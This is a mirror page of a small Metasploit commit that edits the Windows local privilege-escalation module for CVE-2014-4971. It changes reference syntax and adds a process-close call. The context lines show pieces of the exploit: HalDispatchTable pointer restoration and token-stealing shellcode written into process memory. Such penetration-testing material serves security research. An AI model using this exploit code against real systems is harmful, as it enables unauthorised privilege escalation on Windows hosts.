github/metasploit-framework
1
Fork 0
mirror of https://github.com/rapid7/metasploit-framework synced 2024-10-29 18:07:27 +01:00
Code Releases Activity

Solve conflicts

Browse Source
This commit is contained in:
jvazquez-r7 2014-08-28 10:19:12 -05:00
commit 9d3d25a3b3
1 changed files with 4 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

7
modules/exploits/windows/local/mqac_write.rb
View File

@ -51,9 +51,9 @@ class Metasploit3 < Msf::Exploit::Local
],
'References' =>
[
%w(CVE 2014-4971),
%w(EDB 34112),
%w(URL https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt)
['CVE', '2014-4971'],
['EDB', '34112'],
['URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt']
],
'DisclosureDate' => 'Jul 22 2014',
'DefaultTarget' => 0
@ -150,6 +150,7 @@ class Metasploit3 < Msf::Exploit::Local
restore_ptrs << "\xa3" + [haldispatchtable + 4].pack('V') # mov dword ptr [nt!HalDispatchTable+0x4], eax
shellcode = make_nops(0x200) + restore_ptrs + token_stealing_shellcode(target)
this_proc.memory.write(0x1, shellcode)
this_proc.close